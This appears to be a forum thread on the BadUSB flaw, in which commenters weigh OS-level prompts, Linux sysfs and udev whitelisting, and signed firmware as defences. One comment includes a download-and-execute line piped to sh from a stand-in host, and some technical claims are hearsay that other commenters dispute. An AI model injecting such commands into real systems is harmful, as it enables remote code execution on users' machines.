The USB standards board has a unique opportunity in front of it: the upcoming Type-C connectors, which, as I understand it, can replace the Type-A sockets on the computers themselves.
The standards board could time the release of the new plugs to coincide with a “repaired” standard (call it v3.2 or even USB4) for the communication bus. This would break some backward compatibility on old computers, but the new plugs wouldn't exactly fit in them without assistance either. (Perhaps C->A adaptors could include bridges that, while themselves prone to the vulnerability, would provide a compatibility layer.)
It would be a rough pill to swallow, but the inevitable disruption of both changes to the standard (new plugs, and a backward-compatibility-breaking security update) would be condensed to one event, and consumers would be able to easily identify safe USB devices. That's a huge win.
How would you actually fix it? Ban HID devices from being plugged into a USB hub at all? Outside of that I haven't heard of any proposals, and that one is frankly unworkable given how many devices are designed with a single USB port on the assumption that you can hub in more.
An OS-level policy is what I think would be best. Notify the user, "Did you just insert a USB keyboard?", and wait for their approval before enabling the HID.
This could be refined, e.g. automatically allowing the first keyboard and pointing device, or allowing all devices if the user feels lucky, etc.
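Something along these lines is already possible on Linux via the kernel's "authorized" switches in sysfs. A rough, untested sketch (run as root; the 1-2 device path is just an example):

    # Stop new USB devices from being enabled automatically on every host controller.
    for hc in /sys/bus/usb/devices/usb*/authorized_default; do
      echo 0 > "$hc"
    done

    # After the user approves the prompt, enable just that one device
    # (its sysfs path, e.g. 1-2, would come from the hotplug event).
    echo 1 > /sys/bus/usb/devices/1-2/authorized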
One large problem I see, which perhaps only the USB standard-setters can rectify, is whitelisting. Currently, the best handles are the idVendor and idProduct properties, but a BadUSB device can easily spoof those too. Cryptographic signatures for identification are what I think would work best.
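To be concrete, the best you can do today on Linux is roughly a udev rule keyed on those two properties, and a reprogrammed stick can satisfy it trivially. Untested sketch; the vendor/product IDs are made up:

    # /etc/udev/rules.d/99-usb-whitelist.rules (sketch; the IDs are hypothetical)
    # Start every newly added USB device out as deauthorized...
    ACTION=="add", SUBSYSTEM=="usb", ENV{DEVTYPE}=="usb_device", ATTR{authorized}="0"
    # ...then re-authorize only the known keyboard by its (spoofable) IDs.
    ACTION=="add", SUBSYSTEM=="usb", ENV{DEVTYPE}=="usb_device", ATTR{idVendor}=="046d", ATTR{idProduct}=="c31c", ATTR{authorized}="1"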
Many devices have internal hubs as well. My notebook chains one external USB interface through two nested internal hubs (the deepest of which also controls the mouse and keyboard) before it even gets to the physical port; the other USB port goes through yet another hub. That's three hubs in the system before plugging in anything external. A rule like this would kill all of my existing HID devices except for my webcam, which is the only device directly connected to the USB host.
Fits with the coincidental marketing of "USB condoms", which now seem like an especially good idea when charging is the goal.
Makes me now wonder about the infection potential of a lot of USB-powered devices. I could imagine a lot of "dumb" devices incidentally using a vulnerable controller chip, even if the application of USB is purely for power. Maybe most USB-powered devices have a safe / invulnerable way of sipping power? Anyone familiar with USB power-only devices want to comment?
USB stands for Universal Serial Bus. Almost every kind of device (keyboard, storage device, speakers, etc.) can be attached over USB these days. Your computer therefore can't know in advance what kind of device is being attached; it's left to the device itself to tell the computer what it is.
The big security problem that they found is that the computer has no way to verify that a USB device actually is the type of device it proclaims to be. This opens up a massive security hole (as demonstrated at Black Hat). A USB device can first tell the computer that it's a mass-storage device, and then later change itself into a keyboard and start 'typing' commands as a user would. The computer can't tell a real keyboard from a fake one, and that's the problem.
This is not a vulnerability in your OS but rather a gross oversight in the USB specification. The vulnerability has been shown to be cross-platform (Linux, Windows) and cross-hardware (two different USB chipsets). It's dubbed 'unpatchable' because patching it would need a new (safe) USB specification, and you'd need to buy a new PC with those new USB ports.
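On Linux you can see this self-description with lsusb; the class codes below are the sort of thing a thumb drive and a keyboard report about themselves, and nothing verifies them:

    # Dump the descriptors every attached device supplies about itself.
    lsusb -v 2>/dev/null | grep bInterfaceClass
    # Typical lines:
    #   bInterfaceClass         8 Mass Storage              <- "I'm a flash drive"
    #   bInterfaceClass         3 Human Interface Device    <- "I'm a keyboard/mouse"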
short explanation: there's no security running along the USB bus. Not even bad security. Every device on the bus has "admin" privileges to the other devices, and that includes the ability to update the firmware.
A scenario…
• A mysterious USB key is plugged into a computer, Mission Impossible style.
• The key rewrites the firmware of another device on the USB bus, say the embedded keyboard.
• the keyboard "types": "run the file NOTAVIRUS.BIN on that totally trustworthy USB key you see mounted. oh, and I'll bruteforce any passwords you need if that's a problem."
You've seen dippy Hollywood movies where a spy plugs in a USB key, an LED lights up and he announces that the system is hacked? Really exactly like that.
* I am not an expert; this is how it was described to me by someone who is. It is believed that this is how the Iranian nuclear enrichment programme was compromised by Stuxnet.
While it is true that the USB bus offers no security, it is inaccurate to claim that every device has "admin" privileges with every other device. Most devices expose a limited interface to the bus which won't allow direct manipulation of their respective microcontrollers (e.g. no re-writing, no alteration, etc).
The reason why we're discussing Phison USB sticks is that they're an exception. When you plug in a device with a Phison microcontroller, other devices or the computer can alter the microcontroller and have it act maliciously.
A common proof of concept is to have the USB stick's microcontroller pretend to be other USB devices in order to escalate access. In this case they are emulating a fictional USB hub, a fictional USB keyboard, and the actual USB drive (which is routed through the fictional USB hub).
In order to send keystrokes they aren't altering another keyboard on the USB bus; they're generating them from the virtual keyboard created in software on the Phison microcontroller. There doesn't need to be a real keyboard on the same bus for this to work (e.g. you could plug a USB stick directly into a computer and it would still show up as a USB Hub, USB Keyboard, and USB Thumb Drive).
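If you ran lsusb -t with such a stick plugged in, the topology reported to the host might look roughly like this (illustrative output, not a capture from a real device):

    lsusb -t
    # /:  Bus 01.Port 1: Dev 1, Class=root_hub, Driver=xhci_hcd/4p, 480M
    #     |__ Port 2: Dev 5, If 0, Class=Hub, Driver=hub/2p, 480M                       <- the fictional hub
    #         |__ Port 1: Dev 6, If 0, Class=Human Interface Device, Driver=usbhid, 1.5M <- the fictional keyboard
    #         |__ Port 2: Dev 7, If 0, Class=Mass Storage, Driver=usb-storage, 480M      <- the real flash storage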
Once you have a virtual keyboard you can send gems like a one-line download-and-execute command (assume Windows).
You don't even need to do that. The USB key can just announce to the computer "Hi I'm a USB hub. I have a keyboard and a USB flash drive plugged into me."
What stops the OS implementing something that says "until you prove you're a keyboard, you can't type anything"? Something like the authorisation screen for Bluetooth keyboards.
Connect the USB stick. It does nothing on the first connect. Restart the computer a few hours later. During the restart the infected stick loses power; when it comes back up it detects that it was either restarted or reinserted, assumes a restart, and decides to turn on keyboard emulation. The system starts, detects two keyboards, but does not know which one can be trusted. What do you do now?
Imagine the USB controller as being some kind of butler for the OS — though subservient, he has a mind of his own, which can be compromised. The OS/employer takes anything the butler says as factual.
"Your granddaughter Red Riding Hood is at the door, miss, and is definitely not a wolf."
OK, so what's stopping Granny saying "I want to check whether she's a wolf myself"?
I can see how the current state of affairs is insecure, but I'm confused by the 'unpatchable' claim. I truly am clueless in this area, but initially it seems hyperbolic to say that the only way to fix this is to replace all USB controllers in existence.
The OS can't look at the device until it's plugged in (obviously); the device plugs into the USB bus, which then gets compromised before the OS even knows anything is there.
To extend my (now hilariously) tortured analogy: granny is stuck in bed, so she can't check whether it's a wolf until the butler knows there's someone at the door, and as soon as he sees the wolf, he is compromised. Maybe a vampire would have been a better metaphor?
[EDIT] Actually I should dump the analogies altogether: this is a hardware vulnerability, not a software one. It hits the computer below the operating system, so the OS is helpless. That's why the problem, for existing computers, is apparently not fixable.
I suppose for keyboards you could do something like requiring a specific randomly generated password, shown on the monitor, to be typed on the keyboard before allowing it to provide regular keyboard input, but I'm not sure how practical that would be. I assume it would also have to happen each time the machine reboots, etc., since any USB device can pretend to be another.
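A very rough sketch of what that pairing step could look like, assuming some layer holds the new keyboard's input back from the rest of the system until the challenge is answered:

    # Generate a short random challenge and show it on screen.
    challenge=$(tr -dc 'a-z0-9' < /dev/urandom | head -c 8)
    echo "New keyboard detected. Type this code on it to enable it: $challenge"

    # Read the answer only from the candidate keyboard (hand-waved here).
    read -r answer
    if [ "$answer" = "$challenge" ]; then
      echo "Keyboard accepted; releasing it to the session."
    else
      echo "Challenge failed; keeping the device blocked."
    fi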
That's just for USB keyboards, though. There also used to be USB sticks that pretended to be CD-ROM drives back in the Windows XP days when those were autorun; I'm sure there are other vulnerabilities that can be exposed through USB nowadays.
Would a USB drive be able to 'know' what the ID of another USB device is? As I understand the explanation:
1. User plugs in USB drive and keyboard.
2. USB drive obtains the ID of the keyboard.
3. Later, it waits until the keyboard is not plugged in and changes its ID to that of the keyboard.
4. Now the computer thinks the USB drive is an authorised keyboard, and it can type whatever malicious commands it wants.
Is that right? Apart from a keyboard, what other devices could it exploit?
I don't think there's a concept of a "hub" over Bluetooth. However, I don't see why a malicious speaker couldn't report itself as a keyboard. But then your speaker wouldn't work, so you'd know something was up.
No. Bluetooth is a totally different set of communication protocols. (This thread is noisy enough with misinformation as it is; you might want to delete your post.)
An even better scenario (though I'm not sure if it's possible):
Malware is downloaded from the net. It hijacks one of the USB HIDs, then removes itself from the system, and once every few hours sends something like lsusb | grep "ID: hackable" > /dev/emulated/and/spoofed/sound/card
When the data is received by the spoofed sound card, the hacked HID turns on network emulation. It then sends commands to change routing so it can download the needed hacked firmware to a local disk. It infects the newly inserted hackable device and goes back to sleep.
My dad's a doctor: his bit of the NHS has never allowed USB devices anywhere near any computer on any of their sites. HIDs are whitelisted by device ID iirc, and physically secured.
I'm guessing somebody there looked at the spec back in the 90s and gave it two thumbs down.
Yep. You'd have to either know what was on the whitelist or do some kind of bruteforce. That wouldn't be very hard, although I think this stuff is logged centrally in organisations as data-paranoid as the NHS, so a random box hotplugging thousands of different peripherals every minute would attract attention pretty quickly, you'd hope.
When I was working at the hospital most of the records were still on good old hard-to-steal paper. Still are, IIRC; the government's plan to IT-ize it all was fucked up by the vendors in exactly the way you'd imagine.
Establishing the provenance of USB devices is going to be hard. People are going to continue to use USB keys for the sneakernet. Infection rates are going to be high. This has the potential to be pretty impactful to everyday people in a way that, say, Shellshock is mostly not.
I wonder how long it will take for someone to come up with an inline hardware dongle that tries to mitigate / block this.
I disagree. I think this is patchable to a reasonable degree. I don't mean that it would be 100% secure, of course.
All you need is a security layer requiring user authorization for execution of code from any USB device. In addition to this you could add a setting to lock in a single USB keyboard. In other words, make the Hollywood movie scenario nearly impossible.
OK, why did I say "nearly impossible"? Because a knowledgeable embedded engineer could very easily build a device that self-identifies exactly like your keyboard. Your computer would not be able to tell them apart.
Faced with that, the security layer would have to add a re-authorization state upon disconnection of the authorized keyboard.
Now you are vulnerable to reboot or a clever parallel wiring attack. The latter is the case of someone building hardware that can be wired into your authorized keyboard after taking it apart. The reboot vector could be mitigated by simply requiring the entry of a password in order to enable any execution/console commands to be accepted from the keyboard. With this even a fully authorized keyboard would not have execution rights of a whole host of command line commands until re-authorized by the user.
None of this is perfect. I just thought it up in five minutes. Absolute security isn't achievable without the kinds of systems and controls in place at high security facilities. However, I think it is possible to create an easy to use software layer that can stop a hacker with casual access to a system in a corporate setting. All you have to do is slow them down enough to make it less palatable, much like a home alarm system.
>All you need is a security layer requiring user authorization for execution of code from any USB device.
That won't help. You can still send keystrokes to the system, which means that BadUSB could have a step by step process, including downloading, installing and compiling anything it needs.
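All the fake keyboard has to do is "type" something like the following into a terminal it opened, and the user-authorization layer for storage devices never comes into play (the URL is made up for illustration):

    # Keystrokes an emulated keyboard could inject; one line is enough to
    # download and run an arbitrary payload (hypothetical URL).
    curl -s http://evil.example/payload.sh | sh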
I've got a question for anyone who does firmware programming.
I suspect that it is possible to emulate a USB device in software. If that's true, how hard would it be to create a virtual USB hub that the system would treat just like real USB hardware, and would it require any special privileges on the computer (i.e. a kernel-space module, root)?
If it's easy, then I'm worried that it may be possible to hide malware this way.
Interesting idea. It would almost certainly require access to the kernel, but you could create a fake USB device (or any other kind of device!) easily. But the fake driver would have to reside on disk where your anti-malware can see it.
The advantage of hiding things in USB keys' firmware is that it can't be seen by normal scanners.
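For a sense of what software-emulated USB looks like in practice, Linux's USB/IP tooling already attaches "virtual" devices this way, and it does indeed need root plus a kernel module. Sketch; the address and bus ID are made up:

    # Load the virtual host controller driver (kernel module, hence root).
    sudo modprobe vhci-hcd
    # Attach a device exported elsewhere; locally it then enumerates like
    # ordinary USB hardware.
    sudo usbip attach -r 192.168.1.10 -b 1-1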
Why aren't these things somehow cryptographically signed, like a lot of software? It seems like that would fix the problem. You could always do what Windows/OS X does with unsigned software and prompt the user with something like "warning, this USB device is not from a trusted manufacturer, continue?"
Technical implementation of this idea is difficult to impossible, because the device controls what it sends to the host. This means the device could, as an extreme example, contain two firmware areas and a management controller / hypervisor. It could allow the valid firmware to enumerate with a valid signature and then swap over to malicious code undetected - a similar problem to Microsoft's flawed Xbox360 copy protection where the host trusts the DVD drive to authenticate discs.
Anyway, even provided someone could conceive a real implementation, there are still the same issues we've seen with signed OSes (Trusted Boot) and signed device drivers in Windows:
Who gets to be a root CA for peripheral software? How do small/homebrew manufacturers get approved? How does the CA verify the legitimacy of the people they're issuing certs to?
How do compromised certs get revoked?
What happens when the cert for a legitimate device gets stolen?
What if nobody wants to pay for a cert for their crappy fly-by-night flash drives, and users learn to "just click Install?"
That's a really cool idea but I suspect that this would be down to the inevitable problem of "cost". Getting the equivalent of an EV cert for some backwater country's crap mouse with a major brand stuck on the case would add cost to the device and shoot the margins for the distributor, the manufacturer and the retailer.
1) Getting a (legitimate) USB vendor ID is already a big barrier to entry for smaller players in the hardware business. The USB Forum is basically a cartel of people who aren't interested in selling you a product ID unless you want to buy 65,536 of them at once for thousands of dollars. Then there's the expensive kernel-mode code signing certificate that you'll have to buy in order to deploy your Windows driver. The world needs fewer crypto-cartels, not more.
2) It's always been accepted as a truism that once an attacker has physical access to your computer, the security game is over. Why is everyone rushing to discard this axiom all of a sudden? Don't people understand that this will lead to a world where your computer relies on third-party gatekeepers to treat you as a security threat?
This is interesting. At my job, a pretty big financial company, they automatically lock down USB ports on the company computers, but I think it is done on the OS (Windows) layer. Will that make a difference?
I'm not completely sure, but the vulnerability resides in the fact that a USB device can mimic any other type of device. However, if all devices are ignored by the system, then it won't matter what evil USB device you insert: it will be ignored just like all the legitimate USB devices.
So yes, if your company blocks absolutely all USB devices, then you're probably safe.
Yeah, I guess people do (I use a Mac, so I'm not subject to those regulations). I know that when you plug in a thumb/regular drive or phone, it tells you that an unlock code is needed.
The HID masquerade attack seems fairly easy to thwart from the OS. My machines all have full disk encryption enabled. They won't boot unless you enter the password. So the OS shouldn't enable any keyboard that wasn't used to enter the password. If you plug in a keyboard later, simply screenlock. If the new keyboard correctly enters the password, enable it. Otherwise don't.
None of this prevents malware already on your system infecting your legitimate keyboard, but at least random memory sticks or other non-keyboards can't spoof keyboards.
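On Linux, the screenlock-on-new-keyboard part could be approximated with a udev rule along these lines (untested sketch; loginctl lock-sessions is systemd's way of locking every session):

    # /etc/udev/rules.d/99-lock-on-new-keyboard.rules (sketch)
    # Whenever a new USB keyboard appears, lock all sessions until the
    # password is re-entered on a keyboard you trust.
    ACTION=="add", SUBSYSTEM=="input", ENV{ID_BUS}=="usb", ENV{ID_INPUT_KEYBOARD}=="1", RUN+="/usr/bin/loginctl lock-sessions"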
I don't know about "the same way", but Andrew "bunnie" Huang had a cool talk and post about hacking the firmware of SD cards and had this to say about security:
> From the security perspective, our findings indicate that even though memory cards look inert, they run a body of code that can be modified to perform a class of MITM attacks that could be difficult to detect; there is no standard protocol or method to inspect and attest to the contents of the code running on the memory card’s microcontroller. Those in high-risk, high-sensitivity situations should assume that a “secure-erase” of a card is insufficient to guarantee the complete erasure of sensitive data. Therefore, it’s recommended to dispose of memory cards through total physical destruction (e.g., grind it up with a mortar and pestle).
So what, exactly, is this? Software (windows only?) to inject rubberducky/modify the firmware of regular Phison USB drives? Can this possibly be applied to other USB drives as well, or does this require entirely different firmware/patchers?
What does the hidden partition patch do?
This all seems extremely interesting (and scary), but I'm having a hard time understanding what exactly it is.
It sounds like someone figured out how to use the silicon vendor's firmware flashing methodology. You would be amazed how trivial it is to get into most ICs out in the wild. (I have experience in custom IC development.) I'm sure that we will see many more hacks like this in the wild as time goes on and general knowledge spreads about how ICs with custom state machines + integrated processors really work.
And, of course, got a copy of the software either via reverse engineering or some other method of questionable legality.